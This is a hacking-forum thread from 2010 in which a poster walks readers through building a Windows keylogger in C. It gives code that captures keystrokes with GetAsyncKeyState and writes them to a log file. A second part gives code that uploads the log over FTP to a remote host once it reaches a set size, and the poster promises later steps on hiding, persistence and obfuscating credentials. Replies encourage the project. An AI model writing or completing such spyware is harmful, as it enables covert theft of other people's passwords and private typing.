Follow us on Twitter!
Hacking isn't just Computers & Exploits. It's a Philosophy. - Mr_Cheese
Thursday, April 24, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 21
Guests Online: 21
Members Online: 0

Registered Members: 82904
Newest Member: jamessmith123
Latest Articles
View Thread

HellBound Hackers | Computer General | Programming

Author

Keylogger Development Project


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 24-01-10 02:50
So Ive decided to do something a bit different. Instead of just a guide or submitting working code to the code bank, Im going to try and include as many people that want to take part.

The goal of this project is to familiarize people with c and the msdn libraries, it a hopefully fun and interactive way.

Ive written a basic outline of how to log keys using GetAsyncKey. It does not currently work (well it does but I wont post it all). Then I left instructions on usage and to do's for you to fix/add.

The first part Ive kept as simple as possible, (ie, you dont need to worry about pointers in this part), and hopefully commented where necessary. Note: It doesnt follow a perfectly sync logic structure as I tried to show a few different ways to capture keys. Note this should be easy.

Anywho:

Tasks:
*Build a main function and link to the GetKey function.
*Add additional functionality with extra keys.
*Compile and run


Notes: Win XP 32 dev c++ 4.9.9.2 compiled it.

pastebin code
http://pastebin.c. . .

Code

#include <stdio.h>
#include <windows.h>
#include <winuser.h>

extern FILE *out_file;

/*
stdio's keylogger v.01

Compiled on Dev-C++ 4.9.9.2 WinXP 32 Bit

Key Debounce Line ***Just FYI***
while(GetAsyncKeyState(character)==-32768){}

MSDN KEY CODES
http://msdn.microsoft.com/en-us/library/ms927178.aspx

GetAsyncKeyState MSDN Reference
http://msdn.microsoft.com/en-us/library/ms646293(VS.85).aspx

To do: Add Numpad Support, Fnums support, Punctuation.

To use: Build a main function and link to this code.

*/

int GetKey()
{
    short character;
    Sleep(30);
   
    /*ALPHA CHARACTERS V_KEY*/
    for (character=0x41;character <= 0x5A;character++)
    {
        if (GetAsyncKeyState(character)==-32768)
        {   
             out_file = fopen("data.log","a+");
             /*UPPERCASE*/
             if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_LSHIFT))
             {                           
                   while(GetAsyncKeyState(character)==-32768){}
                   fputc(character, out_file);
                   fclose(out_file);
             }
             /*LOWERCASE*/
             else
             {
                   while(GetAsyncKeyState(character)==-32768){}
                   fputc(character+0x20, out_file);
                   fclose(out_file);
             }
           
        } 
    }
   
    /*Numerical Row*/
    for (character=0x30;character <= 0x39;character++)
    {
        if (GetAsyncKeyState(character)==-32768)
        {   
             out_file = fopen("data.log","a+");
             
             /*Map Keys to Special Characters*/
             if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT))
             {                           
                   while(GetAsyncKeyState(character)==-32768){}
                   switch(character)
                   {
                        case(0x31):
                                  fputs("!", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x32):
                                  fputs("@", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x33):
                                  fputs("#", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x34):
                                  fputs("$", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x35):
                                  fputs("%", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x36):
                                  fputs("^", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x37):
                                  fputs("&", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x38):
                                  fputs("*", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x39):
                                  fputs("(", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x30):
                                  fputs(")", out_file);
                                  fclose(out_file);
                                  break;
                       
                        default:
                                fputs("Error\n", out_file);
                                fclose(out_file);
                                break;
                   }
                               
             }
             /*Defaulted Numbers*/
             else
             {
                 while(GetAsyncKeyState(character)==-32768){}
                 fputc(character, out_file);
                 fclose(out_file);
             }
           
        } 
    }
     
    /* Catch Single Special Keys */
    if (GetAsyncKeyState(VK_ESCAPE))
    {
       while(GetAsyncKeyState(VK_RETURN)==-32768){}
       out_file = fopen("data.log","a+");
       fputs("[ESC]", out_file);
       fclose(out_file);
    }

    if (GetAsyncKeyState(VK_SPACE))
    {
       while(GetAsyncKeyState(VK_SPACE)==-32768){}
       out_file = fopen("data.log","a+");
       fputs(" ", out_file);
       fclose(out_file);
    }
   
    if (GetAsyncKeyState(VK_RETURN))
    {
       while(GetAsyncKeyState(VK_RETURN)==-32768){}
       out_file = fopen("data.log","a+");
       fputs("\n", out_file);
       fclose(out_file);
    }
   
    if (GetAsyncKeyState(VK_TAB))
    {
       while(GetAsyncKeyState(VK_TAB)==-32768){}
       out_file = fopen("data.log","a+");
       fputs("[TAB]", out_file);
       fclose(out_file);
    }

   
    if (GetAsyncKeyState(VK_BACK))
    {
       while(GetAsyncKeyState(VK_BACK)==-32768){}
       out_file = fopen("data.log","a+");
       fputs("[BACK]", out_file);
       fclose(out_file);
    }
   
    return 0;
}
       

       





I will update it with different things to do (hiding, persistence, sockets, etc) and add it here when I feel like it. Maybe a day or a month ... who knows.




Edited by on 24-01-10 03:08
Author

RE: Keylogger Development Project


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 25-01-10 15:05
LEVEL 2

First I would like to hear feedback -- positive/negative/indifferent/easy/hard/interesting/boring/etc. If many people just dont care either way Ill stop.

Now for part 2

Ive added a few functions that send logs over ftp when the file size hits 2048 Bytes (~ 1 page)

Hopefully if you are following along you have a main funtion that records keys to a file.
So heres what you get this time.

Objectives are again stated in file but for some redundancy here they are again
[*]Use the MSDN reference http://msdn.micro. . .S.85).aspx to fill in missing parameters
[*]set up an ftp server or use a free web host (x10hosting is the one I used)
[*]Find wininet compile flag (wont compile without it)
[*]Update main function accordingly (I have provided a flowchart that my program follows)
[*]Compile and run

http://pastebin.c. . .

img30.imageshack.us/img30/7976/keyloggerflow.jpg

Code

#include <stdio.h>
#include <wininet.h>
#include <time.h>

/*Part 2
Sending logs
fill in the missing details using
http://msdn.microsoft.com/en-us/library/aa384180%28VS.85%29.aspx
find the linker compile flag for wininet wont compile without it
Use program flow provided and update main function accordingly.
*/

int SendLogs();
int TimeStamp();

extern FILE *out_file;

/*Declare Time Variables*/
struct tm *local;
time_t t;


/*Send Logs over FTP using wininet*/
int SendLogs()
{
    t = time(NULL);
    local = localtime(&t);
   
    HINTERNET hInternet;
    HINTERNET hConnect;
    HINTERNET lRes;
    bool pass;

    hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
    hConnect = InternetConnect(hInternet,"<ftphost>",INTERNET_DEFAULT_FTP_PORT,"what goes here?", "what goes here?", INTERNET_SERVICE_FTP,0,0);                           
    pass = FtpPutFile(hConnect,"data.log",asctime(local),/*Find correct transfer type*/,0);
                               
    InternetCloseHandle(hConnect);
    InternetCloseHandle(hInternet);

    if(pass==false)return 1; //If send fails, it will loop again, Not clearing the Log
    TimeStamp(); // If sends start new log with Time Stamp
    return 0;
}

/*Send on file size > 2048 Bytes (~1page) */
int CheckSize()
{
    int size;
    out_file = fopen("data.log","<how should we open this??>");
    fseek(out_file, 0L, SEEK_END);
    size = ftell(out_file);
    fseek(out_file, 0L, SEEK_SET);
    fclose(out_file);
    if (size > 2048)
    {
             SendLogs();
             return 1; //debugging will stop keylogger after 1 send
    }
    return 0;
}
/*Time Stamps Log file, and Clears Current Content */
int TimeStamp()
{
   
    t = time(NULL);
    local = localtime(&t);
    out_file=fopen("data.log", "w+");
    fputs("------Start Logging Time ------\n", out_file);
    fputs(asctime(local), out_file);
    fputs("-------------------------------\n\n", out_file);
    fclose(out_file);
    return 0;
}





At this point you should have a basic logger that sends data ofter ftp to your host.

UPCOMING TASKS:
simple string encryption so username/passwords/ftphosts arent plainly available under a debugger.
Runtime CRC (cyclic redundancy check) & and fail function




Author

RE: Keylogger Development Project

stealth-
Member



Posts: 1003
Location: Eh?
Joined: 10.04.09
Rank:
Mad User
Posted on 25-01-10 15:39
This sounds like a great project, but unfortunately I don't know C right now Sad. As for those who do know C, not sure why they don't seem interested.....


The irony of man's condition is that the deepest need is to be free of the anxiety of death and annihilation; but it is life itself which awakens it, and so we must shrink from being fully alive.
http://www.stealt. . .
http://www.stealth-x.com
Author

RE: Keylogger Development Project


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 25-01-10 16:51
This is great stdio! I did the same thing to check the file size using fseek() an ftell(). Seeing as I'm completely unfamiliar with sockets for windows I just used cURL for the ftp upload part. Can't wait to see how hiding the password/username is done aswell as the CRC.


Author

RE: Keylogger Development Project

bl4ckc4t
Member

Your avatar

Posts: 591
Location: /etc/
Joined: 07.03.06
Rank:
Wiseman
Posted on 25-01-10 17:46
This is pretty nice, I would say. Gives a simplicity that C doesn't usually have.